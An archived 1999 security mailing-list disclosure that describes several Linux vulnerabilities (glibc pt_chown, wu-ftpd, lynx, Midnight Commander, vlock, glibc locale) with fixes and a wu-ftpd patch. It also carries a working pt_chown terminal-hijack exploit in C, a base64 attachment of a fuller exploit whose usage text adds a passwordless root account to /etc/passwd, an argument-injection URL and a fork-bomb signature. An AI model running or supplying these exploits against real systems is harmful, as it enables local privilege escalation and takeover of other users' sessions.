This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --8323328-1626411126-931088328=:355 Content-Type: TEXT/PLAIN; charset=US-ASCII First of all, something less or more personal - sorry to all secure@...pl people for this post. I'm really angry, as this stuff become well-known without my knowledge... so, only a few of my own observations, always trying to respect other's intellectual property. All the best goes to el- :P ---------------------------------------------- glibc 2.1.x and Linux without devpts mechanism ---------------------------------------------- Compromise: locally, privledges of any user (including superuser) running programs without devpts support compiled in after glibc upgrade (like screen, mc etc). Solution: chmod 700 /usr/libexec/pt_chown There's a bug in pt_chown suid helper program, supplied with glibc 2.1.x (tested on default RH 6.0 distro). This program is designed to allow proper allocation of pseudo-terminals for non-suid programs in systems with glibc 2.1.x installed, but without devpts support compiled into every program (it's enough to have, let's say, screen which uses traditional /dev/ptyXX and /dev/ttyXX scheme). Due to lack of security checks, pt_chown can be easily fooled to gain full control over other user's (root as well) pseudo-terminal, as allocated by screen, Midnight Commander, or virtually any other program. All we need is an open descriptor to /dev/ttyXX (in read or write mode, no matter) - while login uses secure permissions, ttys allocated by eg. screen are 622 by default, so we could gain write access. Then, we have to call pt_chown in a proper way to gain ownership of this device, and put anything we want to the input stream of process controlling this pty using TIOCSTI ioctl()... Automated exploit code is attached (potfory.c). Sorry for polish comments, should be readable anyway? If not, there's 'primal' exploit for this hole: -- simpliest.c -- int main(int a,char* b[]) { char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n"; int i=0,x=open(b[1],1); // Expect writable, allocated // (eg. by screen) /dev/ttyXX as 1st arg if (x<0) { perror(b[1]); exit(1); } if (!fork()) { dup2(x,3); execl("/usr/libexec/pt_chown","pt_chown",0); perror("pt_chown"); exit(1); } sleep(1); for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]); } -- eof -- ---------------------------- wu-ftpd 2.5, VR and BeroFTPD ---------------------------- Compromise: remote root Solution: add strlen() check somewhere There's an overflow in wu-ftpd 2.5 and prior releases (including VR and BeroFTPD) in mapped_path when mapping current working directory to command-line. While I discovered this vunerability by myself, I don't want to provide exploit code, as all other, hard work has been done independently by someone else. Instead of that, there's a .diff file with patch, attached somewhere as ftpd.diff. ------------------ lynx and telnet:// ------------------ Compromise: remote messing with files, maybe more? Lynx has a problem coming from calling external programs to handle protocols like telnet://. Example: attempt of viewing 'telnet://-n.rhosts' URL will result in empty, new and shiny .rhosts file. Unfortunately, as telnet client has session logging off by default, no idea how to put something there? ------------------ mc, ftp:// and $() ------------------ Compromise: remote/local user's privledges Midnight Commander ftp client has an overflow while reading server responses - long enough message will result in beautiful overflow. Enjoy. Also, mc seems to have serious problems with directories containing shell commands enclosed in $(...) construction. Bad. -------- vlock -a -------- Compromise: locally, unlocking VCs switching under certain conditions When 'vlock -a' is called, console switching is completely disabled using ioctl() call on /dev/ttyX device. Under certain conditions, this protection can be fooled. Let's imagine following situation: user X is logged on tty6 - oh, abbandoned session ;) while root is playing on other consoles. After some time, he/she issued 'vlock -a' and gone somewhere. But, if user X is still logged on any console, and he's able to login once more, remotelly, he could open /dev/tty6 (in our example, as it's owned by him), then... use ioctl() (as it's not restricted to superusers!!!) to enable console switching. ------------------------------ glibc 2.0.x and LC_ALL, noexec ------------------------------ Compromise: locally, doing thins you shouldn't be able to do ;) First of all - doing /lib/ld-linux.so.2 /program/on/noexec/partition is the simpliest way to bypass noexec option, if only you have glibc 2.0.x. Nothing to say, security by obscurity stinks. Clean glibc 2.0.x, as distributed in .tar.gz, are vunerable to rather seriuos problem with LC_ALL containing '../' tricks (just like in telnetd and TERM case). In fact, in some Linux distributions, it has been silently fixed, while people upgrading glibc to eg. 2.0.7 'from scratch' are not aware of this problem, and many sites are vunerable. Using prepared directory with locale specifications, including glibc error messages used eg. by perror(), luser will be able to for example read setuid programs memory, etc. _______________________________________________________________________ Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] --8323328-1626411126-931088328=:355 Content-Type: TEXT/PLAIN; charset=ISO-8859-2; name="potfory.c" Content-Transfer-Encoding: BASE64 Content-ID: <lcamtuf.4.05.9907041338480.355at_private> Content-Description: Content-Disposition: attachment; filename="potfory.c" DQovLyAjZGVmaW5lIExDQU1UVUZfSkVTVF9HTFVQSV9JX1NUUklQTkFMX0xJ QkNfQQ0KLy8gcmVsZWFzZSAyLjANCg0KLyoNCg0KICBNYXJjaGV3IEh5cGVy cmVhbCBJbmR1c3RyaWVzIC4gLiAuIC4gLiAuIC4gLiAuICBtYXJjaGV3QGRp b25lLmlkcy5wbA0KICBTdHVtaWxvd3kgTGFzIFRlYW0gLiAuIC4gLiAuIC4g LiAuIC4gLiAuIC4gMTAwbWlsb3d5QHdhcmlhY2kucGRpLm5ldA0KICANCiAg LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVsgUFJFU0VOVFMgXS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KCSAgICAgICAgICAgRCBPIE0g RSBLICAgIE4gQSAgICBQIE8gVCBGIE8gUiBZDQogICAgICAgICAgICAgICBn bHVwaSwgYWxlIHNrdXRlY3pueSBzcGxvaXQgbmEgZ2xpYmNlIDIuMQ0KICAg ICAgICAgICAgICAgICANCiAgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bIChj KSBsY2FtdHVmQGlkcy5wbCBdLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiAg WTJLLWNvbXBhdGlibGUJCQkJCSAgICAgIDI0LzA1Lzk5DQoNCiAgVE9ETzog dyBkb21rdSBuaWUgbWFtIGRldnB0c2ZzJ2EsIHdpZWMgbmllIG1hIHN1cHBv cnR1LCBhbGUgenJvYmnqLA0KICAgICAgICBvYmllY3Vq6i4uLg0KDQogIFph c2FkYSBkemlhs2FuaWE6IHdzcGFuaWGzeSB3eW5hbGF6ZWsgcHQuIHB0X2No b3duLCB3IGt083J5DQogIHphb3BhdHJ6b25lIHOxIGdsaWJjZSAyLjEgKFJl ZEhhdCA2LjApLCBwb3p3YWxhIHByemVqseYga29udHJvbOoNCiAgbmFkIHB0 eXNpYW1pIGlubnljaCB1c2Vy83cgaSBwcnpla2F6YeYgZG93b2xuZSBwb2xl Y2VuaWEgcHJvZ3JhbW93aSwNCiAga3TzcnkgbmEgdHltIHB0eXNpdSB3aXNp LiBXYXJ1bmVrOiBuYSBzdGFyY2llIG11c2lteSBtaWXmIGpha2m2DQogIGRv c3TqcCBkbyBwdHlzaWEgKCtyIGFsYm8gK3cpLCB0YWsgc2nqIHNrs2FkYSC/ ZSBwcm9ncmFteSB0eXB1DQogIHNjcmVlbiwgbWMgaXRwIGRharEgbmFtIHN6 YW5z6i4gT2N6eXdptmNpZSBzZW5zIHcgdb95d2FuaXUgdGVnbw0KICBwcm9n cmFtaWt1IG5hIHB0eXNpZSByb290J2EgaSB3eXOzYW5pdSBkb3dvbG5lZ28g cG9sZWNlbmlhIGRvDQogIGplZ28gc2hlbGxhLg0KDQogIE5hanByb3N0c3p5 IHByenlrbGFkIHW/eWNpYTogb2RwYWxhbXkgc3Bsb2l0YSBuYSByb290YSwg Y3pla2FteSBhvw0KICBydXQgc2llIHphbG9ndWplIGkgb2RwYWxpIGNvcyB3 IHN0eWx1IHNjcmVlbmEgaSBidW0uIFW/eXdhbmllIG5hDQogIGlubnljaCB1 c2VydWYgY2h5YmEgbmllIG1hIHdp6mtzemVnbyBzZW5zdSwgcG96YSB0eW0g amW2bGkgc2NyZWVuDQogIG5pZSBtYSBzdWlkYSwgcG8gcHJvc3R1IHRyYWNp bGliebZteSB6Ynl0IGR1v28gY3phc3UgbmEgdXN0YWxlbmllDQogIGRvIGtv Z28gbmFsZb95IHB0ebYsIHdp6mMgc3Bsb2l0IG1vv2UgbmllIHphZHppYbNh 5i4gVyB0YWtpbQ0KICBwcnp5cGFka3UgZG9waXNhbmllICcjZGVmaW5lIE5B TE9UX1pNQVNPV0FOWSAxJyBpIHd5d2+zYW5pZSBzcGxvaXRhDQogIGRsYSBy b290YSBzcG93b2R1amUgd3lzebNhbmllIGtvbWVuZHkgbmEga2G/ZGVnbyBw dHlzaWEsIGJleg0KICBzcHJhd2R6YW5pYSBjenkgdG8gbnAuIHezYbZuaWUg bmllc3VpZG93eSBzY3JlZW4uDQoNCiAgTmllIHNwaWVzenkgc2nqIG5pa29t dSwgd2nqYyAvZGV2L3R0eT8/IHOxIHNrYW5vd2FuZSBjbyAxMCBzZWt1bmQu DQogIEpltmxpIGt0b7YgY2hjZSwgbmllY2ggc29iaWUgem1pZW5pIExBRyBn ZHppZbYgbmm/ZWouIFByb2dyYW0gaSB0YWsNCiAgamVzdCBkbyB6b3N0YXdp ZW5pYSBuYSBkemll8SA6UA0KDQogIEdyaXR6OiBFbENhLCAxMDBtaWxvd3ks IGxhbTNyeiwgTmlzZXMsIHNvcGVsLCBtYXJ0aW5leiwgTmVyZ2FsLCBldGMu DQoNCiovDQoNCi8vICNkZWZpbmUgTkFMT1RfWk1BU09XQU5ZIDENCg0KI2Rl ZmluZSBNQVNLQV9QVFlTSUEJMDYyMg0KI2RlZmluZSBMQUcJCTEwDQoNCiNp bmNsdWRlIDxzeXMvdGltZS5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K I2luY2x1ZGUgPGRpcmVudC5oPg0KI2luY2x1ZGUgPHN5cy9mY250bC5oPg0K I2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5o Pg0KI2luY2x1ZGUgPHN5cy9zaWduYWwuaD4NCiNpbmNsdWRlIDxzeXMvaW9j dGwuaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxwd2QuaD4N CiNpbmNsdWRlIDxzdHJpbmcuaD4NCg0KI2RlZmluZSBCT0xEICAiXDAzM1sw MDswMW0iDQojZGVmaW5lIE5PUk0gICJcMDMzWzAwOzAwbSINCiNkZWZpbmUg REFSSyAgIlwwMzNbMDA7MDJtIg0KI2RlZmluZSBCTElOSyAiXDAzM1swNW0i DQojZGVmaW5lIEdSRUVOICJcMDMzWzAxOzMybSINCiNkZWZpbmUgUkVEICAg IlwwMzNbMDE7MzFtIg0KI2RlZmluZSBZRUxMICAiXDAzM1swMTszM20iDQoj ZGVmaW5lIEJMVUUgICJcMDMzWzAwOzM2bSINCg0KI2lmZGVmIExDQU1UVUZf SkVTVF9HTFVQSV9JX1NUUklQTkFMX0xJQkNfQQ0KIyAgZGVmaW5lIHN0YXQo YSxiKSBfeHN0YXQoX1NUQVRfVkVSLGEsYikNCiMgIGRlZmluZSBmc3RhdChh LGIpIF9meHN0YXQoX1NUQVRfVkVSLGEsYikNCiNlbmRpZiAvKiBMQ0FNVFVG X0pFU1RfR0xVUElfSV9TVFJJUE5BTF9MSUJDX0EgKi8NCg0KaW50IGd1cGlf dWlkOw0KY2hhciogamVidW07DQoNCg0Kdm9pZCB6dXp5Y2llKHZvaWQpIHsN CiAgcHJpbnRmKEJPTEQgIlNwb3PzYiB6db95Y2lhOiAiIEJMVUUgIi4vcG90 Zm9yeSBqdXplciAncG9sZWNlbmllJ1xuIik7DQogIHByaW50ZihCT0xEICIg ICAuLi5qdXp1YWxseTogIiBCTFVFICIuL3BvdGZvcnkgcm9vdCAnZWNobyBc InI6OjA6MDo6LzovYmluL3NoXCIiDQogICAgICAgICAgICAgICIgPj4vZXRj L3Bhc3N3ZDtsb2dvdXQnIiBOT1JNICJcblxuIik7DQogIGV4aXQoMCk7DQp9 DQoNCg0KaW50IHN6dWthal91aWRhKGNvbnN0IGNoYXIqIGxvZ2luKSB7DQog IHN0cnVjdCBwYXNzd2QqIHB3Ow0KICBzZXRwd2VudCgpOw0KICB3aGlsZSAo KHB3PWdldHB3ZW50KCkpKSBpZiAoIXN0cmNhc2VjbXAobG9naW4scHctPnB3 X25hbWUpKSByZXR1cm4gcHctPnB3X3VpZDsNCiAgcHJpbnRmKCBSRUQgIlsr XSBXIGRvbWt1IG5pZSBtaWVzemthIG5pa3QgbyBsb2dpbmllICclcycuLi4i IE5PUk0gIlxuXG4iLGxvZ2luKTsNCiAgZXhpdCgwKTsNCn0NCg0KDQpjaGFy KiBrb25pZWM9IlxuIjsNCg0KaW50IG9id2FjaGFqX3B0eXNpYShzdHJ1Y3Qg ZGlyZW50ICpzKSB7DQogIGludCBpLHEseix3Ow0KICBzdHJ1Y3Qgc3RhdCBh Ow0KICBpZiAoc3RybGVuKHMtPmRfbmFtZSkhPTUgfHwgc3RybmNtcCgicHR5 IixzLT5kX25hbWUsMykpIHJldHVybiAtMTsNCiAgY2xvc2UoKGk9b3Blbihz LT5kX25hbWUsT19SRE9OTFkpKSk7DQogIGlmIChpPjApIHJldHVybiAtMTsJ Ly8gQmxhaCwgdW51c2VkIHB0eS4uLg0KICBzLT5kX25hbWVbMF09J3QnOwkv LyBwdHkgLT4gdHR5DQogIHByaW50ZihEQVJLICJbK10gUHJ6eWdssWRhbSBz aeogIiBZRUxMICIlcyIgREFSSyI6ICIgQkxVRSxzLT5kX25hbWUpOw0KICBz dGF0KHMtPmRfbmFtZSwmYSk7DQogIGlmIChhLnN0X3VpZCE9Z3VwaV91aWQp IHsNCiAgICBwcmludGYoIm5pZSB0ZW4gb3duZXIgKCVkKS5cbiIsYS5zdF91 aWQpOw0KICAgIHJldHVybiAtMTsNCiAgfQ0KICBwcmludGYoIm93bmVyIGRv YnJ5Iik7DQogIGEuc3RfbW9kZT1hLnN0X21vZGUmMDY2NjsNCiAgaWYgKGEu c3RfbW9kZSE9TUFTS0FfUFRZU0lBKSB7DQojaWZuZGVmIFpNQVNPV0FOWV9B VEFLDQogICAgcHJpbnRmKCIsIGFsZSBjaHliYSB0byBwb215s2thIChtYXNr YTogJW8pLlxuIixhLnN0X21vZGUpOw0KICAgIHJldHVybiAtMTsNCiNlbHNl DQogICAgcHJpbnRmKCIgKHptYXNvd2FueSBuYWxvdCkiKTsNCiNlbmRpZiAv KiBaTUFTT1dBTllfQVRBSyAqLw0KICB9DQogIGk9b3BlbihzLT5kX25hbWUs T19XUk9OTFkpOw0KICBpZiAoaTwwKSB7DQogICAgcHJpbnRmKCIsIGFsZSBu aWUgbWFtIHVwcmF3bmll8S5cbiIpOw0KICAgIHJldHVybiAtMTsNCiAgfQ0K ICBwcmludGYoIiAtICIgWUVMTCAicm9iaW15IHN3b2plIVxuIiBOT1JNKTsN Cg0KICBpZiAoIShxPWZvcmsoKSkpIHsNCiAgICBkdXAyKGksMyk7DQogICAg ZXhlY2woIi91c3IvbGliZXhlYy9wdF9jaG93biIsInB0X2Nob3duIiwwKTsN CiAgICBleGl0KDEpOw0KICB9DQoNCiAgd2FpdHBpZChxLCZ6LDApOw0KDQog IGZzdGF0KGksJmEpOw0KDQogIGlmIChhLnN0X3VpZCE9Z2V0dWlkKCkpIHsN CiAgICBwcmludGYoIlsrXSBFY2gsIGNvtiBuaWUgd3lzerNvIHogcHRfY2hv d24nZW0gOihcbiIpOw0KICAgIGNsb3NlKGkpOw0KICAgIHJldHVybiAtMTsN CiAgfQ0KDQogIHByaW50ZihZRUxMICJbK10gT2tpLCB0cnp5bWFteSBwdHlz aWEgemEgamFqYSwgtmxlbXkga29tZW5k6i4uLlxuIik7DQoNCiAgZm9yICh3 PTA7dzxzdHJsZW4oamVidW0pO3crKykgaW9jdGwoaSxUSU9DU1RJLCZqZWJ1 bVt3XSk7DQogIGZvciAodz0wO3c8c3RybGVuKGtvbmllYyk7dysrKSBpb2N0 bChpLFRJT0NTVEksJmtvbmllY1t3XSk7DQoNCiAgY2xvc2UoaSk7DQoNCiAg cHJpbnRmKCJcbiIgR1JFRU4gIkR6aeprdWplbXkgemEgbG90IHogTWFyY2hl dyBIeXBlcnJlYWwgSW5kdXN0cmllcyA6LSkiIE5PUk0gIlxuXG4iKTsNCg0K ICBleGl0KDApOw0KfQ0KDQoNCg0Kdm9pZCByb2JpbXlfYnVyZGVsKHZvaWQp IHsNCiAgc3RydWN0IGRpcmVudCAqKng7DQogIGludCBhOw0KICBwcmludGYo QkxVRSAiWytdIEN6ZWthbSBuYSBvZmlhcmUgWy9kZXYvdHR5Pz9dIC0gc3By YXdkemFtIGNvICIgWUVMTCAiJWQiIEJMVUUgIiBzZWt1bmQuLi5cbiIsDQog ICAgICAgICBMQUcpOw0KICBpZiAoY2hkaXIoIi9kZXYiKSkgew0KICAgIHBy aW50ZiggUkVEICJbK10gS2kgYnVyYWssIG5pZSBtb2fqIHdlarbmIGRvIC9k ZXYuLi5cblxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KICB3aGlsZSAoMSkg ew0KICAgIGE9c2NhbmRpcigiLiIsJngsb2J3YWNoYWpfcHR5c2lhLDApOw0K ICAgIGlmIChhPDApIHsNCiAgICAgIHByaW50ZiggUkVEICJbK10gQnV1dWss IG5pZSBtb2fqIHByemVza2Fub3dh5iAvZGV2Li4uXG5cbiIpOw0KICAgICAg ZXhpdCgwKTsNCiAgICB9DQogICAgc2xlZXAoTEFHKTsNCiAgfQ0KfQ0KDQoN CmludCBtYWluKGludCBhcmdjLGNoYXIqIGFyZ3ZbXSkgew0KICBwcmludGYo QkxVRSAiXG5NYXJjaGV3IEh5cGVycmVhbCBJbmR1c3RyaWVzICIgQk9MRCAi b3JheiAiIEdSRUVOICJTdHVtaWxvd3kgTGFzIFRlYW0iDQoJIEJPTEQgIiBw cmV6ZW50dWqxOlxuIik7DQogIHByaW50ZiggWUVMTCBCTElOSyAiRG9tZWsg TmEgUG90Zm9yeSAiIE5PUk0gIi0gZ3VwaSwgYWxlIHNrdXRlY3pueSBzcGxv aXQgbmEgZ2xpYmNlIDIuMVxuIik7DQogIHByaW50ZiggREFSSyAiU2NlbmFy aXVzeiwgd3lzdHLzaiB3bup0cnogaSBtdXp5a2E6ICIgQk9MRCAiPGxjYW10 dWZAaWRzLnBsPlxuIik7DQogIGlmIChhcmdjLTMpIHp1enljaWUoKTsNCiAg Z3VwaV91aWQ9c3p1a2FqX3VpZGEoYXJndlsxXSk7DQogIGplYnVtPWFyZ3Zb Ml07DQogIHByaW50ZihCTFVFICJbK10gVUlEICIgWUVMTCAiJWQiIEJMVUUg IiwgcG9sZWNlbmllIGRvIHByemVrYXphbmlhIHNoZWxsb3dpOiAiIEJPTEQg IiVzXG4iLA0KICAgICAgICAgZ3VwaV91aWQsamVidW0pOw0KICByb2JpbXlf YnVyZGVsKCk7DQogIHByaW50ZihOT1JNICJcbiIpOw0KICBleGl0KDApOw0K fQ0K --8323328-1626411126-931088328=:355 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ftpd.diff" Content-Transfer-Encoding: BASE64 Content-ID: <lcamtuf.4.05.9907041338481.355at_private> Content-Description: Content-Disposition: attachment; filename="ftpd.diff" KioqIGZ0cGQuYwlTdW4gSnVuICA2IDE1OjIwOjIxIDE5OTkNCi0tLSBmdHBk X3BhdGNoZWQuYwlTdW4gSnVuICA2IDE1OjE1OjAzIDE5OTkNCioqKioqKioq KioqKioqKg0KKioqIDEyNDUsMTI1MSAqKioqDQogICAgICAgIC8qIGFwcGVu ZCB0aGUgZGlyIHBhcnQgd2l0aCBhIGxlYWRpbmcgLyB1bmxlc3MgYXQgcm9v dCAqLw0KICAgICAgICBpZiggIShtYXBwZWRfcGF0aFswXSA9PSAnLycgJiYg bWFwcGVkX3BhdGhbMV0gPT0gJ1wwJykgKQ0KICAgICAgICAgICAgICAgIHN0 cmNhdCggbWFwcGVkX3BhdGgsICIvIiApOw0KISAgICAgICBzdHJjYXQoIG1h cHBlZF9wYXRoLCBkaXIgKTsNCiAgfQ0KICANCiAgaW50DQotLS0gMTI0NSwx MjU0IC0tLS0NCiAgICAgICAgLyogYXBwZW5kIHRoZSBkaXIgcGFydCB3aXRo IGEgbGVhZGluZyAvIHVubGVzcyBhdCByb290ICovDQogICAgICAgIGlmKCAh KG1hcHBlZF9wYXRoWzBdID09ICcvJyAmJiBtYXBwZWRfcGF0aFsxXSA9PSAn XDAnKSApDQogICAgICAgICAgICAgICAgc3RyY2F0KCBtYXBwZWRfcGF0aCwg Ii8iICk7DQohICAgICAgIGlmICggc3RybGVuKG1hcHBlZF9wYXRoKSArIHN0 cmxlbiAoZGlyKSA8IDQwOTUgKQ0KISAgICAgICAgICAgICAgIHN0cmNhdCgg bWFwcGVkX3BhdGgsIGRpciApOw0KISAgICAgICBlbHNlIA0KISAgICAgICAg IHN5c2xvZyhMT0dfRVJSLCAiRlRQIG1hcHBlZF9wYXRoIGF0dGFjayAiKTsN CiAgfQ0KICANCiAgaW50DQo= --8323328-1626411126-931088328=:355--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:05 PDT